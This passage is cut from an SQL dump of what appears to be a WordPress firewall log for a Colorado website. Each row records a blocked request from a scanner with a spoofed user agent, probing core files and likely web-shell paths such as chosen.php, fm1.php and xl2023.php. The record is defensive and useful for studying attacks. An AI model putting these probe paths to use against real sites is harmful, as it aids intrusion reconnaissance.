User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133603,1699888538.603416,1699888538.594700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/link-template.php','http://eckankar-colorado.org/wp-includes/link-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2xpbmstdGVtcGxhdGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133310,1699888649.970308,1699888649.955100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/sites/default/files/','http://eckankar-colorado.org/sites/default/files/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133313,1699888648.932201,1699888648.923300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/user.php','http://eckankar-colorado.org/wp-admin/includes/user.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3VzZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133315,1699888648.245328,1699888648.236400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/update.php','http://eckankar-colorado.org/wp-admin/includes/update.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3VwZGF0ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133081,1699791109.654020,1699791109.631400,0x00000000000000000000FFFF33DE9E0E,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133159,1699888490.840081,1699888490.831000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-patterns-registry.php','http://eckankar-colorado.org/wp-includes/class-wp-block-patterns-registry.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXBhdHRlcm5zLXJlZ2lzdHJ5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133156,1699888491.866214,1699888491.857400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-template.php','http://eckankar-colorado.org/wp-includes/class-wp-block-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133149,1699888494.353412,1699888494.344700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-customize-control.php','http://eckankar-colorado.org/wp-includes/class-wp-customize-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWN1c3RvbWl6ZS1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133157,1699888491.506645,1699888491.497900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-supports.php','http://eckankar-colorado.org/wp-includes/class-wp-block-supports.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXN1cHBvcnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133158,1699888491.171826,1699888491.163100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-styles-registry.php','http://eckankar-colorado.org/wp-includes/class-wp-block-styles-registry.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXN0eWxlcy1yZWdpc3RyeS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133148,1699888494.688351,1699888494.679700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-customize-manager.php','http://eckankar-colorado.org/wp-includes/class-wp-customize-manager.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWN1c3RvbWl6ZS1tYW5hZ2VyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133151,1699888493.662196,1699888493.653000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-comment-query.php','http://eckankar-colorado.org/wp-includes/class-wp-comment-query.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWNvbW1lbnQtcXVlcnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133150,1699888494.004449,1699888493.992700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-comment.php','http://eckankar-colorado.org/wp-includes/class-wp-comment.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWNvbW1lbnQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133110,1699825266.162399,1699825266.152800,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/options-reading.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L29wdGlvbnMtcmVhZGluZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133114,1699826405.384142,1699826405.374700,0x00000000000000000000FFFF29D8BCA2,0,403,0,0,0,'https://eckankar-colorado.org/chosen.php?p=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133111,1699825265.558729,1699825265.537200,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/xl2023.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsMjAyMy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133112,1699826391.913504,1699826391.876400,0x00000000000000000000FFFF29D8BCA2,0,403,0,0,0,'https://eckankar-colorado.org/woh.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvaC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133113,1699826377.919293,1699826377.897200,0x00000000000000000000FFFF29D8BCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/linkpreview/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9saW5rcHJldmlldy9kYi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133122,1699840868.472916,1699840868.451000,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://www.eckankar-colorado.org/chosen.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133118,1699837353.289623,1699837353.280700,0x00000000000000000000FFFF9DF524B2,0,403,0,0,0,'https://eckankar-colorado.org/fm1.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ZtMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133119,1699837352.423370,1699837352.414500,0x00000000000000000000FFFF9DF524B2,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/press/wp-class.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wcmVzcy93cC1jbGFzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133120,1699840910.861235,1699840910.852500,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-content/plugins/WordPressCore/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133121,1699840901.287420,1699840901.265600,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://www.eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133138,1699888498.864364,1699888498.855600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-editor.php','http://eckankar-colorado.org/wp-includes/class-wp-editor.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWVkaXRvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133209,1699888692.728777,1699888692.720000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/apikey/','http://eckankar-colorado.org/wp-content/plugins/apikey/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkv\",\"category\":\"brute-force\",\"ssl\":1}'),(133211,1699888691.410191,1699888691.380900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/admin/upload/','http://eckankar-colorado.org/admin/upload/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 